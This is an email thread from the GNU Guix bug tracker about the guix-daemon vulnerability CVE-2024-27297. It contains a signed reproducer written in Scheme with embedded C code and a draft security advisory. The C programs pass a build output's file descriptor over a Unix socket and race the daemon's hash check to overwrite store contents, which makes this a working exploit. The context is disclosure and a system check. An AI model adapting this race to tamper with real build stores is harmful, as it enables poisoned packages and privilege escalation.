VULNERABL= E! builder for `/gnu/store/gph10hc3b2ys49sx58l5wjj4ybf81a2l-checking-for-vulne= rability.drv' failed with exit code 1 build of /gnu/store/gph10hc3b2ys49sx58l5wjj4ybf81a2l-checking-for-vulnerabi= lity.drv failed View build log at '/var/log/guix/drvs/gp/h10hc3b2ys49sx58l5wjj4ybf81a2l-che= cking-for-vulnerability.drv.gz'. guix build: error: build of `/gnu/store/gph10hc3b2ys49sx58l5wjj4ybf81a2l-ch= ecking-for-vulnerability.drv' failed =2D-8<---------------cut here---------------end--------------->8--- At this point, /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-= 65f05aca-17261 is corrupt: =2D-8<---------------cut here---------------start------------->8--- $ cat /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrat= es-fd-65f05aca-17261 This file has been corrupted! =2D-8<---------------cut here---------------end--------------->8--- You can remove those corrupt test files by running: guix gc -D /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-ex= filtrates-fd* You can find corrupt files in your store by running: guix gc --verify=3Dcontents This is expensive because it reads every single file under /gnu/store and check the hash of each store item against that recorded in /var/guix/db/db.sqlite. It should flag all the /gnu/store/=E2=80=A6-derivation-that-exfiltrates-fd* outputs. Ludo=E2=80=99. --=-=-= Content-Type: text/plain Content-Disposition: inline; filename=fixed-output-derivation-corruption.scm Content-Description: The reproducer ;; Checking for CVE-2024-27297. ;; Adapted from . (use-modules (guix) (guix modules) (guix profiles) (gnu packages) (gnu packages gnupg) (gcrypt hash) ((rnrs bytevectors) #:select (string->utf8))) (define (compiled-c-code name source) (define build-profile (profile (content (specifications->manifest '("gcc-toolchain"))))) (define build (with-extensions (list guile-gcrypt) (with-imported-modules (source-module-closure '((guix build utils) (guix profiles))) #~(begin (use-modules (guix build utils) (guix profiles)) (load-profile #+build-profile) (system* "gcc" "-Wall" "-g" "-O2" #+source "-o" #$output))))) (computed-file name build)) (define sender-source (plain-file "sender.c" " #include #include #include #include #include #include #include #include int main(int argc, char **argv) { setvbuf(stdout, NULL, _IOLBF, 0); int sock = socket(AF_UNIX, SOCK_STREAM, 0); // Set up an abstract domain socket path to connect to. struct sockaddr_un data; data.sun_family = AF_UNIX; data.sun_path[0] = 0; strcpy(data.sun_path + 1, \"dihutenosa\"); // Now try to connect, To ensure we work no matter what order we are // executed in, just busyloop here. int res = -1; while (res < 0) { printf(\"attempting connection...\\n\"); res = connect(sock, (const struct sockaddr *)&data, offsetof(struct sockaddr_un, sun_path) + strlen(\"dihutenosa\") + 1); if (res < 0 && errno != ECONNREFUSED) perror(\"connect\"); if (errno != ECONNREFUSED) break; usleep(500000); } // Write our message header. struct msghdr msg = {0}; msg.msg_control = malloc(128); msg.msg_controllen = 128; // Write an SCM_RIGHTS message containing the output path. struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); hdr->cmsg_len = CMSG_LEN(sizeof(int)); hdr->cmsg_level = SOL_SOCKET; hdr->cmsg_type = SCM_RIGHTS; int fd = open(getenv(\"out\"), O_RDWR | O_CREAT, 0640); memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int)); msg.msg_controllen = CMSG_SPACE(sizeof(int)); // Write a single null byte too. msg.msg_iov = malloc(sizeof(struct iovec)); msg.msg_iov[0].iov_base = \"\"; msg.msg_iov[0].iov_len = 1; msg.msg_iovlen = 1; // Send it to the othher side of this connection. res = sendmsg(sock, &msg, 0); if (res < 0) perror(\"sendmsg\"); int buf; // Wait for the server to close the socket, implying that it has // received the commmand. recv(sock, (void *)&buf, sizeof(int), 0); }")) (define receiver-source (mixed-text-file "receiver.c" " #include #include #include #include #include #include #include int main(int argc, char **argv) { int sock = socket(AF_UNIX, SOCK_STREAM, 0); // Bind to the socket. struct sockaddr_un data; data.sun_family = AF_UNIX; data.sun_path[0] = 0; strcpy(data.sun_path + 1, \"dihutenosa\"); int res = bind(sock, (const struct sockaddr *)&data, offsetof(struct sockaddr_un, sun_path) + strlen(\"dihutenosa\") + 1); if (res < 0) perror(\"bind\"); res = listen(sock, 1); if (res < 0) perror(\"listen\"); while (1) { setvbuf(stdout, NULL, _IOLBF, 0); printf(\"accepting connections...\\n\"); int a = accept(sock, 0, 0); if (a < 0) perror(\"accept\"); struct msghdr msg = {0}; msg.msg_control = malloc(128); msg.msg_controllen = 128; // Receive the file descriptor as sent by the smuggler. recvmsg(a, &msg, 0); struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); while (hdr) { if (hdr->cmsg_level == SOL_SOCKET && hdr->cmsg_type == SCM_RIGHTS) { int res; // Grab the copy of the file descriptor. memcpy((void *)&res, CMSG_DATA(hdr), sizeof(int)); printf(\"preparing our hand...\\n\"); ftruncate(res, 0); // Write the expected contents to the file, tricking Nix // into accepting it as matching the fixed-output hash. write(res, \"hello, world\\n\", strlen(\"hello, world\\n\")); // But wait, the file is bigger than this! What could // this code hide? // First, we do a bit of a hack to get a path for the // file descriptor we received. This is necessary because // that file doesn't exist in our mount namespace! char buf[128]; sprintf(buf, \"/proc/self/fd/%d\", res); // Hook up an inotify on that file, so whenever Nix // closes the file, we get notified. int inot = inotify_init(); inotify_add_watch(inot, buf, IN_CLOSE_NOWRITE); // Notify the smuggler that we've set everything up for // the magic trick we're about to do. close(a); // So, before we continue with this code, a trip into Nix // reveals a small flaw in fixed-output derivations. When // storing their output, Nix has to hash them twice. Once // to verify they match the \"flat\" hash of the derivation // and once more after packing the file into the NAR that // gets sent to a binary cache for others to consume. And // there's a very slight window inbetween, where we could // just swap the contents of our file. But the first hash // is still noted down, and Nix will refuse to import our // NAR file. To trick it, we need to write a reference to // a store path that the source code for the smuggler drv // references, to ensure it gets picked up. Continuing... // Wait for the next inotify event to drop: read(inot, buf, 128); // first read + CA check has just been done, Nix is about // to chown the file to root. afterwards, refscanning // happens... // Empty the file, seek to start. ftruncate(res, 0); lseek(res, 0, SEEK_SET); // We swap out the contents! static const char content[] = \"This file has been corrupted!\\n\"; write(res, content, strlen (content)); close(res); printf(\"swaptrick finished, now to wait..\\n\"); return 0; } hdr = CMSG_NXTHDR(&msg, hdr); } close(a); } }")) (define nonce (string-append "-" (number->string (car (gettimeofday)) 16) "-" (number->string (getpid)))) (define original-text "This is the original text, before corruption.") (define derivation-that-exfiltrates-fd (computed-file (string-append "derivation-that-exfiltrates-fd" nonce) (with-imported-modules '((guix build utils)) #~(begin (use-modules (guix build utils)) (invoke #+(compiled-c-code "sender" sender-source)) (call-with-output-file #$output (lambda (port) (display #$original-text port))))) #:options `(#:hash-algo sha256 #:hash ,(sha256 (string->utf8 original-text))))) (define derivation-that-grabs-fd (computed-file (string-append "derivation-that-grabs-fd" nonce) #~(begin (open-output-file #$output) ;make sure there's an output (execl #+(compiled-c-code "receiver" receiver-source) "receiver")) #:options `(#:hash-algo sha256 #:hash ,(sha256 #vu8())))) (define check (computed-file "checking-for-vulnerability" #~(begin (use-modules (ice-9 textual-ports)) (mkdir #$output) ;make sure there's an output (format #t "This depends on ~a, which will grab the file descriptor and corrupt ~a.~%~%" #+derivation-that-grabs-fd #+derivation-that-exfiltrates-fd) (let ((content (call-with-input-file #+derivation-that-exfiltrates-fd get-string-all))) (format #t "Here is what we see in ~a: ~s~%~%" #+derivation-that-exfiltrates-fd content) (if (string=? content #$original-text) (format #t "Failed to corrupt ~a, \ your system is safe.~%" #+derivation-that-exfiltrates-fd) (begin (format #t "We managed to corrupt ~a, \ meaning that YOUR SYSTEM IS VULNERABLE!~%" #+derivation-that-exfiltrates-fd) (exit 1))))))) check --=-=-=-- --==-=-= Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- iQJBBAEBCgArFiEEPORkVYqE/cadtAz7CQsRmT2a67UFAmXwXJQNHGx1ZG9AZ251 Lm9yZwAKCRAJCxGZPZrrtZQED/9cu9Wq+0e6bKFMCXjpF5DSjBbuZ/jQTBtyC2NK wOCNzeY2Us3C9gGp9y+78Bq8JIOAmZK/zUFuFotR4e9mcaD2SiKQYkQq913xNsvu 8qS/si39CmPRltbbT6ExxIulrLfRgaGXQudWCEn457VCX04WlvyMhVUTpMzEqaYF jml1UKKxozrkn9OGqiaLy5L5E8HQuTr8ZUOxHfi0omT0yP+KOxfZTuEoYB+hAPSS oIa97fsredd38XjJ6SzK2O4wurUVzwFR8DzIMGUkJj9StJboizEQsDtL1JjRoNv4 g8cxatt5m0Dr5pb7FDamoUHSB/GcOOoTmhg7WXOn3anNB58nCWGJynKZqzSMJ0W4 r+Mu3MLnV4E4ugOiBbqT9rfVQ/O7+YlrUJpJMzZetsLestetsGCIuk7NMDbUC7QW jjXE3CFQagqSVDcsURvjLyRUztgRHvsN9mfAjeG03mOCoadSvlz8zCGQyBWavSJ2 mHNkW2H7WioklHYqPh7J0XCGCd7uwKD7vUqPkqso2ogVvzheD/mliAq9Z7TaP+2u YJbTJXFxYA7ZmiOk2hYBGRzF2kEYICX7jZUyE9pmFG/Dqm1yLMdpgLFeZOTywrto Tz927oa6UGyLYMgly4BRxGKfsgQni38vQlUqYY1pch0eSv4d+1vF6lzodt9sigZD m4EaMg== =h0hp -----END PGP SIGNATURE----- --==-=-=-- From debbugs-submit-bounces@debbugs.gnu.org Tue Mar 12 10:36:27 2024 Received: (at 69728) by debbugs.gnu.org; 12 Mar 2024 14:36:27 +0000 Received: from localhost ([127.0.0.1]:43342 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rk3Ew-0002N0-OB for submit@debbugs.gnu.org; Tue, 12 Mar 2024 10:36:27 -0400 Received: from mail-4316.protonmail.ch ([185.70.43.16]:24517) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rk3Et-0002MX-4v for 69728@debbugs.gnu.org; Tue, 12 Mar 2024 10:36:25 -0400 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=protonmail.com; s=protonmail3; t=1710254142; x=1710513342; bh=9vZz1qci+avginabnebtqb3++m3hG4gBE+urF1wt6sA=; h=Date:To:From:Cc:Subject:Message-ID:In-Reply-To:References: Feedback-ID:From:To:Cc:Date:Subject:Reply-To:Feedback-ID: Message-ID:BIMI-Selector; b=nl+ylr5wllxXckaXu+rAxqNBOQ8ujRr/URtxMX9K1K2XvjINfCpgau6LPjn1tqILR NFPZ+ETbaDCGn47Op8voM6pMQl96J4ob+7gRGh7C72F5MRLdP0cKsjs0tVUv+EpmV4 qsxFMj6h5MM195rlQTe3wWf9MOf/6HEK3tweRTS8jAtY1sA2Q1I8GThWtsk2nQt2x5 OIaaPhjoznvr39jB5VA97aitCVguephsEX/hvRHjHW9XaF2I+3jMU3UerJaZSz9NuT GKHy8ZVzvWjZrkyYhrB9Tlp51CeX5a/yysYSNdpCIRNLA4k0tFOzE4K8yBSMuMZiga /Gg2rWWdaGMoA== Date: Tue, 12 Mar 2024 14:35:18 +0000 To: =?utf-8?Q?Ludovic_Court=C3=A8s?= From: John Kehayias Subject: Re: Reproducer for the daemon fixed-output derivation vulnerability Message-ID: <87msr334do.fsf@protonmail.com> In-Reply-To: <871q8flg17.fsf_-_@gnu.org> References: <87frwwo1mo.fsf@gnu.org> <871q8flg17.fsf_-_@gnu.org> Feedback-ID: 7805494:user:proton MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="b1_xKx1i44DOSvJ7Di9xFsftR2PTnqrPGv5eGX1yxtDQ" X-Spam-Score: -0.0 (/) X-Debbugs-Envelope-To: 69728 Cc: Picnoir , guix-security@gnu.org, =?utf-8?Q?Th=C3=A9ophane_Hufschmitt?= , 69728@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -1.0 (-) This is a multi-part message in MIME format. --b1_xKx1i44DOSvJ7Di9xFsftR2PTnqrPGv5eGX1yxtDQ Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 -----BEGIN PGP SIGNATURE----- iQJRBAEBCgA7FiEEpCB7VsJVEJ8ssxV+SZCXrl6oFdkFAmXwaBwdHGpvaG4ua2Vo YXlpYXNAcHJvdG9ubWFpbC5jb20ACgkQSZCXrl6oFdk6Fg//aEuH516qXJrKpmAc VqB1L/38z/UlbWlhT1n8HBqW5JsEd137FMw0WBeIVYVoWFuQJVaJPjtwWQNbXOfO VKFITVw41hCMBhCNQmpBu1cuzVGmxX9MP2laWeDSpDT1uswuX4HxZaPrgU7LxFHz G8wl2onDGheyN+/kaw/h6isv7yAI0jH+Tk8epkcyRUHCM9N1mdv3aVPcd1ZOzktW ugkzNrA+2KdZXLZm2frr0Elh9xXBNi7owi0g5BSFtsEhqgbqTcb+IwuoT+2PXPH7 bZFE3Bpp6xI38+gY1XBMEZ/+ZY/5fScScGH4hejBJiEDAFVtaNvlJDeL6hbTCAX2 MvL/wkwMv2ODmsbJ7XfI/XG90E3IKrQ83/H7GBO2sIA2rM5wCnGjXuT+NMiJuoce FnLjEamwu8lesHPSp81rpz8vEtzBywND/hhCeu0B+p6s9lbPyQKO8AMLtKCuZM94 a04XCCQDwKzcxKSiN6jF4b76kcS7kdrRS8qHPqVGzmwqkRJJVdCMlvoO3PtuAI+J EDMQyU8FAFRqOE69Aomr056LLLwQqfWfXln6evFeznFvLEAo3SF2Yl4QW4MngLye b5rPxGy9HggI3KfexsWLJNzMTdxyZql4uO3Ye6/SKYfmCNezy+4wSUtd+8EM4LqK ZRF4fbqgZ5KjllnMH7oZjXm7b0A=3D =3DjN50 -----END PGP SIGNATURE----- Hi all, On Tue, Mar 12, 2024 at 02:45 PM, Ludovic Court=C3=A8s wrote: > As promised, attached is a reproducer that I adapted from the Nix one at > , which I think was written by > puck . > > The program demonstrates the vulnerability using two fixed-output > derivations that must be built concurrently on the same machine. > Thanks for the reproducer and instructions. I've included the code an a brief overview of how to run and what to look for in the updated post (along with other changes noted privately). The updated post is attached. I will have some time here and there over the next few hours to make changes, but will mostly be away from my Guix machine to handle actually pushing. So, once it looks good, feel free to do that or I can do it this evening my time (in about 7-8 hours). Thanks again Ludo=E2=80=99 for all your work here! John --b1_xKx1i44DOSvJ7Di9xFsftR2PTnqrPGv5eGX1yxtDQ Content-Type: application/octet-stream; name=cve-2024-27297-post.md Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename=cve-2024-27297-post.md dGl0bGU6IEZpeGVkLU91dHB1dCBEZXJpdmF0aW9uIFNhbmRib3ggQnlwYXNzIChDVkUtMjAyNC0y NzI5NykKYXV0aG9yOiBKb2huIEtlaGF5aWFzCnRhZ3M6IFNlY3VyaXR5IEFkdmlzb3J5CmRhdGU6 IDIwMjQtMDMtMTIgMTA6MDAKLS0tCgpBIHNlY3VyaXR5IGlzc3VlIGhhcyBiZWVuIGlkZW50aWZp ZWQgaW4KW2BndWl4LWRhZW1vbmBdKGh0dHBzOi8vZ3VpeC5nbnUub3JnL2VuL21hbnVhbC9kZXZl bC9lbi9odG1sX25vZGUvSW52b2tpbmctZ3VpeF8wMDJkZGFlbW9uLmh0bWwpCndoaWNoIGFsbG93 cyBmb3IgW2ZpeGVkLW91dHB1dApkZXJpdmF0aW9uc10oaHR0cHM6Ly9ndWl4LmdudS5vcmcvbWFu dWFsL2RldmVsL2VuL2h0bWxfbm9kZS9EZXJpdmF0aW9ucy5odG1sI2luZGV4LWZpeGVkXzAwMmRv dXRwdXQtZGVyaXZhdGlvbnMpLApzdWNoIGFzIHNvdXJjZSBjb2RlIHRhcmJhbGxzIG9yIEdpdCBj aGVja291dHMsIHRvIGJlIGNvcnJ1cHRlZCBieSBhbgp1bnByaXZpbGVnZWQgdXNlci4gVGhpcyBj b3VsZCBhbHNvIGxlYWQgdG8gbG9jYWwgcHJpdmlsZWdlIGVzY2FsYXRpb24uClRoaXMgd2FzIG9y aWdpbmFsbHkgcmVwb3J0ZWQgdG8gTml4IGJ1dCBhbHNvIGFmZmVjdHMgR3VpeCBhcyB3ZSBzaGFy ZQpzb21lIHVuZGVybHlpbmcgY29kZSBmcm9tIGFuIG9sZGVyIHZlcnNpb24gb2YgTml4IGZvciB0 aGUKYGd1aXgtZGFlbW9uYC4gUmVhZGVycyBvbmx5IGludGVyZXN0ZWQgaW4gbWFraW5nIHN1cmUg dGhlaXIgR3VpeCBpcyB1cAp0byBkYXRlIGFuZCBubyBsb25nZXIgYWZmZWN0ZWQgYnkgdGhpcyB2 dWxuZXJhYmlsaXR5IGNhbiBza2lwIGRvd24gdG8KdGhlICJVcGdyYWRpbmciIHNlY3Rpb24uCgoj IFZ1bG5lcmFiaWxpdHkKClRoZSBiYXNpYyBpZGVhIG9mIHRoZSBhdHRhY2sgaXMgdG8gcGFzcyBm aWxlIGRlc2NyaXB0b3JzIHRocm91Z2ggVW5peApzb2NrZXRzIHRvIGFsbG93IGFub3RoZXIgcHJv Y2VzcyB0byBtb2RpZnkgdGhlIGRlcml2YXRpb24gY29udGVudHMuClRoaXMgd2FzIGZpcnN0IHJl cG9ydGVkIHRvIE5peCBieSBqYWRlIGFuZCBwdWNraXBlZGlhIHdpdGggZnVydGhlcgpkZXRhaWxz IGFuZCBhIHByb29mIG9mIGNvbmNlcHQKW2hlcmVdKGh0dHBzOi8vaGFja21kLmlvLzAzVUdlcmV3 UmN5M2RiNDRKUW9XdncpLiBOb3RlIHRoYXQgdGhlIHByb29mCm9mIGNvbmNlcHQgaXMgd3JpdHRl biBmb3IgTml4IGFuZCBoYXMgYmVlbiBhZGFwdGVkIGZvciBHTlUgR3VpeCBiZWxvdy4KVGhpcyBz ZWN1cml0eSBhZHZpc29yeSBpcyByZWdpc3RlcmVkIGFzCltDVkUtMjAyNC0yNzI5N10oaHR0cHM6 Ly93d3cuY3ZlLm9yZy9DVkVSZWNvcmQ/aWQ9Q1ZFLTIwMjQtMjcyOTcpCihkZXRhaWxzIGFyZSBh bHNvIGF2YWlsYWJsZSBhdCBOaXgncyBHaXRIdWIgW3NlY3VyaXR5CmFkdmlzb3J5XShodHRwczov L2dpdGh1Yi5jb20vTml4T1Mvbml4L3NlY3VyaXR5L2Fkdmlzb3JpZXMvR0hTQS0yZmZqLXc0bWot cGczNykpCmFuZCByYXRlZCAibW9kZXJhdGUiIGluIHNldmVyaXR5LgoKQSBmaXhlZC1vdXRwdXQK W2Rlcml2YXRpb25dKGh0dHBzOi8vZ3VpeC5nbnUub3JnL2VuL21hbnVhbC9kZXZlbC9lbi9odG1s X25vZGUvRGVyaXZhdGlvbnMuaHRtbCkKaXMgb25lIHdoZXJlIHRoZSBvdXRwdXQgaGFzaCBpcyBr bm93biBpbiBhZHZhbmNlLiBGb3IgaW5zdGFuY2UsIHRvCnByb2R1Y2UgYSBzb3VyY2UgdGFyYmFs bC4gVGhlIEdOVSBHdWl4IGJ1aWxkIHNhbmRib3ggcHVycG9zZWZ1bGx5CmV4Y2x1ZGVzIG5ldHdv cmsgYWNjZXNzIChmb3Igc2VjdXJpdHkgYW5kIHRvIGVuc3VyZSB3ZSBjYW4gY29udHJvbCBhbmQK cmVwcm9kdWNlIHRoZSBidWlsZCBlbnZpcm9ubWVudCksIGJ1dCBhIGZpeGVkLW91dHB1dCBkZXJp dmF0aW9uIGRvZXMKaGF2ZSBuZXR3b3JrIGFjY2VzcywgZm9yIGluc3RhbmNlIHRvIGRvd25sb2Fk IHRoYXQgc291cmNlIHRhcmJhbGwuCkhvd2V2ZXIsIGFzIHN0YXRlZCwgdGhlIGhhc2ggb2Ygb3V0 cHV0IG11c3QgYmUga25vd24gaW4gYWR2YW5jZSwgYWdhaW4KZm9yIHNlY3VyaXR5ICh3ZSBrbm93 IGlmIHRoZSBmaWxlIGNvbnRlbnRzIHdvdWxkIGNoYW5nZSkgYW5kCnJlcHJvZHVjaWJpbGl0eSAo c2hvdWxkIGFsd2F5cyBoYXZlIHRoZSBzYW1lIG91dHB1dCkuIFRoZQpgZ3VpeC1kYWVtb25gIGhh bmRsZXMgdGhlIGJ1aWxkIHByb2Nlc3MgYW5kIHdyaXRpbmcgdGhlIG91dHB1dCB0byB0aGUKc3Rv cmUsIGFzIGEgcHJpdmlsZWdlZCBwcm9jZXNzLgoKSW4gdGhlIGJ1aWxkIHNhbmRib3ggZm9yIGEg Zml4ZWQtb3V0cHV0IGRlcml2YXRpb24sIGEgZmlsZSBkZXNjcmlwdG9yCnRvIGl0cyBjb250ZW50 cyBjb3VsZCBiZSBzaGFyZWQgd2l0aCBhbm90aGVyIHByb2Nlc3MgdmlhIGEgVW5peApzb2NrZXQu IFRoaXMgb3RoZXIgcHJvY2Vzcywgb3V0c2lkZSBvZiB0aGUgYnVpbGQgc2FuZGJveCwgY2FuIHRo ZW4KbW9kaWZ5IHRoZSBjb250ZW50cyB3cml0dGVuIHRvIHRoZSBzdG9yZSwgY2hhbmdpbmcgdGhl bSB0byBzb21ldGhpbmcKbWFsaWNpb3VzIG9yIG90aGVyd2lzZSBjb3JydXB0aW5nIHRoZSBvdXRw dXQuIFdoaWxlIHRoZSBvdXRwdXQgaGFzaApoYXMgYWxyZWFkeSBiZWVuIGRldGVybWluZWQsIHRo ZXNlIGNoYW5nZXMgd291bGQgbWVhbiBhIGZpeGVkLW91dHB1dApkZXJpdmF0aW9uIGNvdWxkIGhh dmUgY29udGVudHMgd3JpdHRlbiB0byB0aGUgc3RvcmUgd2hpY2ggZG8gbm90IG1hdGNoCnRoZSBl eHBlY3RlZCBoYXNoLiBUaGlzIGNvdWxkIHRoZW4gYmUgdXNlZCBieSB0aGUgdXNlciBvciBvdGhl cgpwYWNrYWdlcyBhcyB3ZWxsLgoKIyBNaXRpZ2F0aW9uCgpUaGlzIHNlY3VyaXR5IGlzc3VlICh0 cmFja2VkIFtoZXJlXShodHRwczovL2lzc3Vlcy5ndWl4LmdudS5vcmcvNjk3MjgpCmZvciBHTlUg R3VpeCkgaGFzIGJlZW4gZml4ZWQgYnkKW3R3b10oaHR0cHM6Ly9naXQuc2F2YW5uYWguZ251Lm9y Zy9jZ2l0L2d1aXguZ2l0L2NvbW1pdC8/aWQ9OGY0ZmZiM2ZhZTEzM2JiMjFkNzk5MWU5N2MyZjE5 YTcxMDhiMTE0MykKW2NvbW1pdHNdKGh0dHBzOi8vZ2l0LnNhdmFubmFoLmdudS5vcmcvY2dpdC9n dWl4LmdpdC9jb21taXQvP2lkPWZmMTI1MWRlMGJjMzI3ZWM0NzhmYzY2YTU2MjQzMGZiZjM1YWVm NDIpCmJ5IEx1ZG92aWMgQ291cnTDqHMuIFVzZXJzIHNob3VsZCBtYWtlIHN1cmUgdGhleSBoYXZl IHVwZGF0ZWQgdG8gW3RoaXMKc2Vjb25kCmNvbW1pdF0oaHR0cHM6Ly9naXQuc2F2YW5uYWguZ251 Lm9yZy9jZ2l0L2d1aXguZ2l0L2NvbW1pdC8/aWQ9ZmYxMjUxZGUwYmMzMjdlYzQ3OGZjNjZhNTYy NDMwZmJmMzVhZWY0MikKdG8gYmUgcHJvdGVjdGVkIGZyb20gdGhpcyB2dWxuZXJhYmlsaXR5LiBV cGdyYWRlIGluc3RydWN0aW9ucyBhcmUgaW4KdGhlIGZvbGxvd2luZyBzZWN0aW9uLgoKV2hpbGUg c2V2ZXJhbCBwb3NzaWJsZSBtaXRpZ2F0aW9uIHN0cmF0ZWdpZXMgd2VyZSBkZXRhaWxlZCBpbiB0 aGUKb3JpZ2luYWwgcmVwb3J0LCB0aGUgc2ltcGxlc3QgZml4IGlzIGp1c3QgY29weSB0aGUgZGVy aXZhdGlvbiBvdXRwdXQKc29tZXdoZXJlIGVsc2UsIGRlbGV0aW5nIHRoZSBvcmlnaW5hbCwgYmVm b3JlIHdyaXRpbmcgdG8gdGhlIHN0b3JlLgpBbnkgZmlsZSBkZXNjcmlwdG9ycyB3aWxsIG5vIGxv bmdlciBwb2ludCB0byB0aGUgY29udGVudHMgd2hpY2ggZ2V0CndyaXR0ZW4gdG8gdGhlIHN0b3Jl LCBzbyBvbmx5IHRoZSBgZ3VpeC1kYWVtb25gIHNob3VsZCBiZSBhYmxlIHRvCndyaXRlIHRvIHRo ZSBzdG9yZSwgYXMgZGVzaWduZWQuIFRoaXMgaXMgd2hhdCB0aGUgTml4IHByb2plY3QgdXNlZCBp bgp0aGVpciBbb3duCmZpeF0oaHR0cHM6Ly9naXRodWIuY29tL05peE9TL25peC9jb21taXQvMjQ0 ZjNlZWUwYmJjN2YxMWU5YjM4M2ExNWVkNzM2OGUyYzRiZWNjOSkuClRoaXMgZG9lcyBhZGQgYW4g YWRkaXRpb25hbCBjb3B5L2RlbGV0ZSBmb3IgZWFjaCBmaWxlLCB3aGljaCBtYXkgYWRkIGEKcGVy Zm9ybWFuY2UgcGVuYWx0eSBmb3IgZGVyaXZhdGlvbnMgd2l0aCBtYW55IGZpbGVzLgoKQSBwcm9v ZiBvZiBjb25jZXB0IGJ5IEx1ZG92aWMsIGFkYXB0ZWQgZnJvbSB0aGUgb25lIGluIHRoZSBvcmln aW5hbApOaXggcmVwb3J0LCBpcyBhdmFpbGFibGUgYXQgdGhlIGVuZCBvZiB0aGlzIHBvc3QuIE9u ZSBjYW4gcnVuIHRoaXMKY29kZSB3aXRoCgpgYGBzaApndWl4IGJ1aWxkIC1mIGZpeGVkLW91dHB1 dC1kZXJpdmF0aW9uLWNvcnJ1cHRpb24uc2NtIC1NNApgYGAKClRoaXMgd2lsbCBvdXRwdXQgd2hl dGhlciB0aGUgY3VycmVudCBgZ3VpeC1kYWVtb25gIGJlaW5nIHVzZWQgaXMKdnVsbmVyYWJsZSBv ciBub3QuIElmIGl0IGlzIHZ1bG5lcmFibGUsIHRoZSBvdXRwdXQgd2lsbCBpbmNsdWRlIGEgbGlu ZSBzaW1pbGFyIHRvCgpgYGBzaApXZSBtYW5hZ2VkIHRvIGNvcnJ1cHQgL2dudS9zdG9yZS95bHM3 eGtnOGswaTBxeGFiOHN2OTYwcXN5NmEweGN6Ny1kZXJpdmF0aW9uLXRoYXQtZXhmaWx0cmF0ZXMt ZmQtNjVmMDVhY2EtMTcyNjEsIG1lYW5pbmcgdGhhdCBZT1VSIFNZU1RFTSBJUyBWVUxORVJBQkxF IQpgYGAKClRoZSBjb3JydXB0ZWQgZmlsZSBjYW4gYmUgcmVtb3ZlZCB3aXRoCgpgYGBzaApndWl4 IGdjIC1EIC9nbnUvc3RvcmUveWxzN3hrZzhrMGkwcXhhYjhzdjk2MHFzeTZhMHhjejctZGVyaXZh dGlvbi10aGF0LWV4ZmlsdHJhdGVzLWZkKgpgYGAKCkluIGdlbmVyYWwsIGNvcnJ1cHQgZmlsZXMg ZnJvbSB0aGUgc3RvcmUgY2FuIGJlIGZvdW5kIHdpdGgKCmBgYHNoCmd1aXggZ2MgLS12ZXJpZnk9 Y29udGVudHMKYGBgCgp3aGljaCB3aWxsIGFsc28gaW5jbHVkZSBhbnkgZmlsZXMgY29ycnVwdGVk IGJ5IHRocm91Z2ggdGhpcwp2dWxuZXJhYmlsaXR5LiBEbyBub3RlIHRoYXQgdGhpcyBjb21tYW5k IGNhbiB0YWtlIGEgbG9uZyB0aW1lIHRvCmNvbXBsZXRlIGFzIGl0IGNoZWNrcyBldmVyeSBmaWxl IHVuZGVyIGAvZ251L3N0b3JlYCwgd2hpY2ggbGlrZWx5IGhhcwptYW55IGZpbGVzLgoKIyBVcGdy YWRpbmcKCkR1ZSB0byB0aGUgc2V2ZXJpdHkgb2YgdGhpcyBzZWN1cml0eSBhZHZpc29yeSwgd2Ug c3Ryb25nbHkgcmVjb21tZW5kCmFsbCB1c2VycyB0byB1cGdyYWRlIHRoZWlyIGBndWl4LWRhZW1v bmAgaW1tZWRpYXRlbHkuCgpGb3IgYSBHdWl4IFN5c3RlbSB0aGUgcHJvY2VkdXJlIGlzIGp1c3Qg cmVjb25maWd1cmluZyB0aGUgc3lzdGVtIGFmdGVyCmEgYGd1aXggcHVsbGAsIGVpdGhlciByZXN0 YXJ0aW5nIGBndWl4LWRhZW1vbmAgb3IgcmVib290aW5nLiBGb3IKZXhhbXBsZSwKCmBgYHNoCmd1 aXggcHVsbApzdWRvIGd1aXggc3lzdGVtIHJlY29uZmlndXJlIC9ydW4vY3VycmVudC1zeXN0ZW0v Y29uZmlndXJhdGlvbi5zY20Kc3VkbyBoZXJkIHJlc3RhcnQgZ3VpeC1kYWVtb24KYGBgCgp3aGVy ZSBgL3J1bi9jdXJyZW50LXN5c3RlbS9jb25maWd1cmF0aW9uLnNjbWAgaXMgdGhlIGN1cnJlbnQg c3lzdGVtCmNvbmZpZ3VyYXRpb24gYnV0IGNvdWxkLCBvZiBjb3Vyc2UsIGJlIHJlcGxhY2VkIGJ5 IGEgc3lzdGVtCmNvbmZpZ3VyYXRpb24gZmlsZSBvZiBhIHVzZXIncyBjaG9pY2UuCgpGb3IgR3Vp eCBydW5uaW5nIGFzIGEgcGFja2FnZSBtYW5hZ2VyIG9uIG90aGVyIGRpc3RyaWJ1dGlvbnMsIG9u ZQpuZWVkcyB0byBgZ3VpeCBwdWxsYCB3aXRoIGBzdWRvYCwgYXMgdGhlIGBndWl4LWRhZW1vbmAg cnVucyBhcyByb290LAphbmQgcmVzdGFydCB0aGUgYGd1aXgtZGFlbW9uYCBzZXJ2aWNlLiBGb3Ig ZXhhbXBsZSwgb24gYSBzeXN0ZW0gdXNpbmcKc3lzdGVtZCB0byBtYW5hZ2Ugc2VydmljZXMsCgpg 